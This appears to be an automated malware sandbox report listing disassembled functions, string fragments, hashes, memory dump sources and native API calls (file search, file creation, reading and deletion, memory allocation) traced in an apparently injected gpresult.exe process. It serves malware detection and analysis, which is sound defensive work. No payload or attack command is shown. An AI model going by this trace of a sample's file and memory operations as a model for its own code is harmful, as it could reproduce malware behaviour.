
Similarity

API ID:
String ID: 3/67$4([#$4([L$NUK[$[8+.${
API String ID: 0-3944088191
Opcode ID: 1405bd1ead68b5538eb616cdcf1c2e47d68c2d0b6fd758fa08ba43f2497e3e05
Instruction ID: e5b080205708da3cd6cecb5928d66fe20adaf2901b544c25e5b2d15923479a4f
Opcode Fuzzy Hash: 1405bd1ead68b5538eb616cdcf1c2e47d68c2d0b6fd758fa08ba43f2497e3e05
Instruction Fuzzy Hash: 9241FEB4E01398DBCB24CF95AA8468DFFB1BF00708FA08198D19A7F205D7725A86CF55

Function 03B60C06 Relevance: 6.4, Strings: 5, Instructions: 198COMMON

Download Yara Rule

Strings

i, xrefs: 03B60C51
o, xrefs: 03B60C4A
, xrefs: 03B60C3C
l, xrefs: 03B60C58
u, xrefs: 03B60C43

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: $i$l$o$u
API String ID: 0-2051669658
Opcode ID: a992ef77b20c57ce275b168eec8ef91b221524aa1fe999c7c49dc132dd5abd29
Instruction ID: b9e3d07603cada311232a5d6e47c62d0cf697c64a0d4c90ec32c3edc834ac7d3
Opcode Fuzzy Hash: a992ef77b20c57ce275b168eec8ef91b221524aa1fe999c7c49dc132dd5abd29
Instruction Fuzzy Hash: 7F6150B5904308AFDB24DBA5CC80FEFB7FDEB48714F1445A9E519A7241E734AA41CB60

Function 03B5E053 Relevance: 6.4, Strings: 5, Instructions: 105COMMON

Download Yara Rule

Strings

k, xrefs: 03B5E1BE
e, xrefs: 03B5E1C5
, xrefs: 03B5E1B0
7hH\, xrefs: 03B5E0F9
o, xrefs: 03B5E1B7

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: $7hH\$e$k$o
API String ID: 0-2900377470
Opcode ID: ff218888cd3e9ac976c108376f6519a86338f93623fd62028c92320a689f01bd
Instruction ID: 3d42d90ab55a5ac047c0b77768c9af04892bb0c4bc16969bf3153f7f6149594e
Opcode Fuzzy Hash: ff218888cd3e9ac976c108376f6519a86338f93623fd62028c92320a689f01bd
Instruction Fuzzy Hash: 26319972908309AFD715EFA4D885ACEFBB5FF45319B0402EEE8148F142EB329645CB95

Function 03B5CD56 Relevance: 6.3, Strings: 5, Instructions: 88COMMON

Download Yara Rule

Strings

m, xrefs: 03B5CE20
h, xrefs: 03B5CE2E
4, xrefs: 03B5CE19
7, xrefs: 03B5CE35
6, xrefs: 03B5CE27

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: 4$6$7$h$m
API String ID: 0-119014576
Opcode ID: 3d1abd4b8f9d9c4535645d2b791659c36898f0eeebcb9212847daa4b8e68e5b4
Instruction ID: 1676f3d3ff2a6c3f3958b02e98cfd5a0b3eb0303ba5850bf172b05fd98171bb2
Opcode Fuzzy Hash: 3d1abd4b8f9d9c4535645d2b791659c36898f0eeebcb9212847daa4b8e68e5b4
Instruction Fuzzy Hash: 313130B5910209BBEB10EB94DD41FFF77B8EF08308F0041A9E904AB240E775AB048BE5

Function 03B608A6 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

o, xrefs: 03B608DC
, xrefs: 03B608D5
k, xrefs: 03B608E3
e, xrefs: 03B608EA

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 1e8a0876f89c90ac3a90a0a5fb8ef105bf49d22ee43fff4b2c39c8f3d312687b
Instruction ID: 1dd78893f3c28902779da2f0aa6c7af2d7e45c862ba2e82ad9fb55285608b227
Opcode Fuzzy Hash: 1e8a0876f89c90ac3a90a0a5fb8ef105bf49d22ee43fff4b2c39c8f3d312687b
Instruction Fuzzy Hash: 54B1FBB5A04704AFDB24DBA5CC84FEFB7BDAF88704F1485A8F619A7240D674AA41CB50

Function 03B5E17C Relevance: 5.0, Strings: 4, Instructions: 29COMMON

Download Yara Rule

Strings

k, xrefs: 03B5E1BE
e, xrefs: 03B5E1C5
, xrefs: 03B5E1B0
o, xrefs: 03B5E1B7

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: $e$k$o
API String ID: 0-3624523832
Opcode ID: 73e42dbaef944525be721de6731b0fb886a760401a9b9df33f43d68d5ab53ce3
Instruction ID: aa8ec93d2669e372b34223e970feb023e968ed9317931e0eb7ef03ca8fbaa928
Opcode Fuzzy Hash: 73e42dbaef944525be721de6731b0fb886a760401a9b9df33f43d68d5ab53ce3
Instruction Fuzzy Hash: 52F03077904214AE8714EBACDC848DEB3B8EE5921870885EAD9199F211E631D641C7A4

Function 03B4A4E6 Relevance: 5.0, Strings: 4, Instructions: 24COMMON

Download Yara Rule

Strings

R, xrefs: 03B4A50A
GZIP, xrefs: 03B4A4EC
FLAT, xrefs: 03B4A4FC
, xrefs: 03B4A516

Memory Dump Source

Source File: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 038F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_38f0000_JBOkmqufMEGwlAXNwkIjNoQeH.jbxd

Yara matches

Similarity

API ID:
String ID: $FLAT$GZIP$R
API String ID: 0-2699176770
Opcode ID: f6e2d1265d2ef17cd03e2b21efe952a3e68b29f7ecdc1bdd5c697e9637a136f2
Instruction ID: 553a4f4f3ca25b8ba0e19da453f5f9f23ee5a560f292a538e0b78280ca249dee
Opcode Fuzzy Hash: f6e2d1265d2ef17cd03e2b21efe952a3e68b29f7ecdc1bdd5c697e9637a136f2
Instruction Fuzzy Hash: A7F0657094124C9BDB04DFA4DA446EEBB74FF04208F6045B8D9199F242E77487058B97

Analysis Process: gpresult.exePID: 6960, Parent PID: 3784COMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	4.3%
Signature Coverage:	1.5%
Total number of Nodes:	461
Total number of Limit Nodes:	73

Executed Functions

Function 0087C050 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0087C131
FindNextFileW.KERNELBASE(?,00000010), ref: 0087C16E
FindClose.KERNELBASE(?), ref: 0087C179

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 34391a60596c005b95f24fcb193acb484456f5666f2c9164be276bfd9391801c
Instruction ID: 7c99d176b71b67e4b5f03b13b4304044cff27e0fce4d19ff3a968320b83d25cc
Opcode Fuzzy Hash: 34391a60596c005b95f24fcb193acb484456f5666f2c9164be276bfd9391801c
Instruction Fuzzy Hash: CE31A371900208BBDB20EB64CC8AFEB737CFB45744F544558F908E7185DA70AE858BA1

Function 00887DF0 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,00000095,?,?,?,?), ref: 00887EDF

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 82cc80b28b5d9c6698ade6a7b78c24aa418523d3e9e7e881dd95b16f29b190b7
Instruction ID: 3c21189cdf680a453e970e4e5a62e727d60525034a18eeabc12aaa7c52dbb11e
Opcode Fuzzy Hash: 82cc80b28b5d9c6698ade6a7b78c24aa418523d3e9e7e881dd95b16f29b190b7
Instruction Fuzzy Hash: 1F31E2B5A00209AFCB14DF99D881EEEB7F9FF8C704F108219F908E3241D774A8118BA5

Function 00887F50 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,00000095,?,?), ref: 00888024

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1bd1492cb2a5f7b65d0d4c9550e06f3f8dd7a5cb67bd375c64a9376ce72b7d96
Instruction ID: f283ace5b6944996b1dcdfb883e713275189acfde33b4bffe8df956e57d920ae
Opcode Fuzzy Hash: 1bd1492cb2a5f7b65d0d4c9550e06f3f8dd7a5cb67bd375c64a9376ce72b7d96
Instruction Fuzzy Hash: D531E6B5A00209AFDB14DF99D881EEFB7B9EF8C714F158209FD08A7241D774A811CBA5

Function 00888210 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00871C4B,?,00886E97,00000000,00000004,00003000,?,?,?,?,?,00886E97,00871C4B,?,00886E97,00000000), ref: 008882C9

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 994357b948804bd2f49661de760b33c308874e352238b0e143bcec2e56ac7175
Instruction ID: fb258e943789504c1e22b4b49b49c4eab821f01e6823b1867328d6bef35e6081
Opcode Fuzzy Hash: 994357b948804bd2f49661de760b33c308874e352238b0e143bcec2e56ac7175
Instruction Fuzzy Hash: 77216DB5A00209AFDB14EF59DC41EAFB7B9FF88300F108109FD48A7241D770A811CBA5

Function 00888030 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 008880B4

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45870e1f1b1f81b6d4efc523c14dad45dcfbe782c5d25175020b5fa4a04ef121
Instruction ID: a25ba1ecb27348fdc4757c4c4d8e62221de96c52c64f9599dc4e1a8601b6504c
Opcode Fuzzy Hash: 45870e1f1b1f81b6d4efc523c14dad45dcfbe782c5d25175020b5fa4a04ef121
Instruction Fuzzy Hash: 0301A175600204BBD620FA69DC0AFAB73ACEF85710F04410AFA48EB181DB747901C7E6

Function 008880C0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 008880F7

Memory Dump Source

Source File: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_860000_gpresult.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 8f890ca3714386d65644240d92c6891899fbb3f79d9138dafabd0b0cdfca10ca
Instruction ID: 51f3fb5b1cc48762af14d3a25458058330dd711b9fd81c79e8407b732a89df3d
Opcode Fuzzy Hash: 8f890ca3714386d65644240d92c6891899fbb3f79d9138dafabd0b0cdfca10ca
Instruction Fuzzy Hash: 88E04F362002047BD620BA59DC05F9B779CEBC5710F058015FA49A7142CA70B90087F5

Function 04904650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0490465A

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b9fb759b87d03b31bc087a00c71e213b60269ffa73e588802c1ad82c3bd52fc
Instruction ID: 9f409d3152b5bbceb156351fee66bf13f2e537023d4f7eccddb0700797f76ae9
Opcode Fuzzy Hash: 1b9fb759b87d03b31bc087a00c71e213b60269ffa73e588802c1ad82c3bd52fc
Instruction Fuzzy Hash: 96900261641604436140B158480840670499BE2305395C126A0655561C8718D955A269

Function 04904340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0490434A

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad885fa03229aafe332d007f230e5abf1a27fc929e3c9c4fd41bc7cf0ce9a9e5
Instruction ID: a8e9353964e7cb361a74b55d25a643868b092fc2f4a384bffc9cb4df7320f14b
Opcode Fuzzy Hash: ad885fa03229aafe332d007f230e5abf1a27fc929e3c9c4fd41bc7cf0ce9a9e5
Instruction Fuzzy Hash: 2690023164590413B140B158488854650499BE1305B55C022E0525555C8B14DA566361

Function 04902CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902CAA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7d72e291f004a38a097918f3aa0f8695512705a96aa92d60b3a5dec0654902d3
Instruction ID: 4a39f9189bd1cd0699124611cbc2153f21f9b9463cbbd80cb6d2929de3566b09
Opcode Fuzzy Hash: 7d72e291f004a38a097918f3aa0f8695512705a96aa92d60b3a5dec0654902d3
Instruction Fuzzy Hash: B390023124150803F100B598540C64610498BE1305F55D022A5125556EC765D9917131

Function 04902C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902C7A

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e0fa32663f95a041869fd077c57045438bbce8528250ebe3d135ef2a7e7d99ad
Instruction ID: f1f21a487aa0867b466ff18f2d994fd88445a33943c088eff438a345009db96c
Opcode Fuzzy Hash: e0fa32663f95a041869fd077c57045438bbce8528250ebe3d135ef2a7e7d99ad
Instruction Fuzzy Hash: 0290023124158C03F110B158840874A10498BD1305F59C422A4525659D8795D9917121

Function 04902C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902C6A

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33828634573a046513f6f395dc59f3550c2c2c76c19ccdafb514b1daef28b056
Instruction ID: 5d531e98c78c69d605221b84807c39000be2a98ecc790c1cbb8b2d9c60694058
Opcode Fuzzy Hash: 33828634573a046513f6f395dc59f3550c2c2c76c19ccdafb514b1daef28b056
Instruction Fuzzy Hash: 0390023124150C43F100B1584408B4610498BE1305F55C027A0225655D8715D9517521

Function 04902DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902DDA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1eeef839e5b3a3dd7c0aee00ce2d54eb06831c59bebc5f3d810a7ad25c65d51d
Instruction ID: 482b44daa88b781de858932aedbfb1d6e40b5c871896b13689d95eeb88651d0e
Opcode Fuzzy Hash: 1eeef839e5b3a3dd7c0aee00ce2d54eb06831c59bebc5f3d810a7ad25c65d51d
Instruction Fuzzy Hash: 4A900221282545537545F1584408507504A9BE1245795C023A1515951C8626E956E621

Function 04902DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902DFA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18c471d727e4af9c795c3a55d53c26781b7010a3d97db1938e01c485873d49d1
Instruction ID: 2f7c2d628181a58c73b721259672e7c8c0bfc309bcfa072a4ce7a4d56aee92bc
Opcode Fuzzy Hash: 18c471d727e4af9c795c3a55d53c26781b7010a3d97db1938e01c485873d49d1
Instruction Fuzzy Hash: CE90023124150813F111B1584508707104D8BD1245F95C423A0525559D9756DA52B121

Function 04902D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902D1A

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7cc4fe2c8aa8fdf2e0ffb371d26d1d5e7910b333a66d95bdae83e3dd1700be4f
Instruction ID: 55ac6bf089a0961f1f4cb7d27e533210f55540c6470eab755641445a13d8b9d6
Opcode Fuzzy Hash: 7cc4fe2c8aa8fdf2e0ffb371d26d1d5e7910b333a66d95bdae83e3dd1700be4f
Instruction Fuzzy Hash: 2F90022925350403F180B158540C60A10498BD2206F95D426A0116559CCA15D9696321

Function 04902D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902D3A

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66a67a854bd9a8fe5415df6307f51826571cd94125743cdea56f2f273e910be7
Instruction ID: 5199b4ced04f636d81e871153edf7f4c69d9d142bb9c2b75c3e2414f5ce95524
Opcode Fuzzy Hash: 66a67a854bd9a8fe5415df6307f51826571cd94125743cdea56f2f273e910be7
Instruction Fuzzy Hash: AC90022134150403F140B158541C6065049DBE2305F55D022E0515555CDA15D9566222

Function 04902E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902E8A

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c8f97cc5e08f9b758b6f7933452d792692ac13e00c8426668c540e670c97d28
Instruction ID: 1f7970473f8e40de2c5b89550ea06a55899ba405f659090951f2d63a77c0da1a
Opcode Fuzzy Hash: 8c8f97cc5e08f9b758b6f7933452d792692ac13e00c8426668c540e670c97d28
Instruction Fuzzy Hash: C390022164150903F101B1584408616104E8BD1245F95C033A1125556ECB25DA92B131

Function 04902EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902EEA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 33625cf52ef93876f2ee04e0db39ed05376eafe8259d63b0d4121cfa9b749460
Instruction ID: a472f7803aa1998af675888abe3f14022b2bcd465c59c7faf87ad20ff294c9a8
Opcode Fuzzy Hash: 33625cf52ef93876f2ee04e0db39ed05376eafe8259d63b0d4121cfa9b749460
Instruction Fuzzy Hash: BE90026124190803F140B558480860710498BD1306F55C022A2165556E8B29DD517135

Function 04902FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902FBA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce18dad848679c8318947f93c3df24be2cecb165f7db9d959e4e746993d75082
Instruction ID: 848f0794ea80595bc4eedcdb14ee32e2bb5da8e82fa57f2b02cc9e04ed67baa1
Opcode Fuzzy Hash: ce18dad848679c8318947f93c3df24be2cecb165f7db9d959e4e746993d75082
Instruction Fuzzy Hash: D6900221641504436140B16888489065049AFE2215755C132A0A99551D8659D9656665

Function 04902FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902FEA

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e57ef1cf908cc32ae23e133ace39ae755f2c64df118ead1eda0d3325154361e9
Instruction ID: f07087faca845d9dfd26225d6489aa31caa2e82aa707b03cd891d38674b6a9ab
Opcode Fuzzy Hash: e57ef1cf908cc32ae23e133ace39ae755f2c64df118ead1eda0d3325154361e9
Instruction Fuzzy Hash: E2900221251D0443F200B5684C18B0710498BD1307F55C126A0255555CCA15D9616521

Function 04902F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04902F3A

Memory Dump Source

Source File: 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, Offset: 04890000, based on PE: true

Associated: 0000000D.00000002.4947804085.00000000049B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.00000000049BD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4890000_gpresult.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dff1921409cb876ba819f868ba78cc7cd420e960f4384cb12203c797dc69c0b
Instruction ID: a189b4e790c263318c400959cf46dc1e2757b332b9a42ed5fe06879f8dea9069
Opcode Fuzzy Hash: 4dff1921409cb876ba819f868ba78cc7cd420e960f4384cb12203c797dc69c0b
Instruction Fuzzy Hash: 6A90026138150843F100B1584418B061049CBE2305F55C026E1165555D8719DD527126

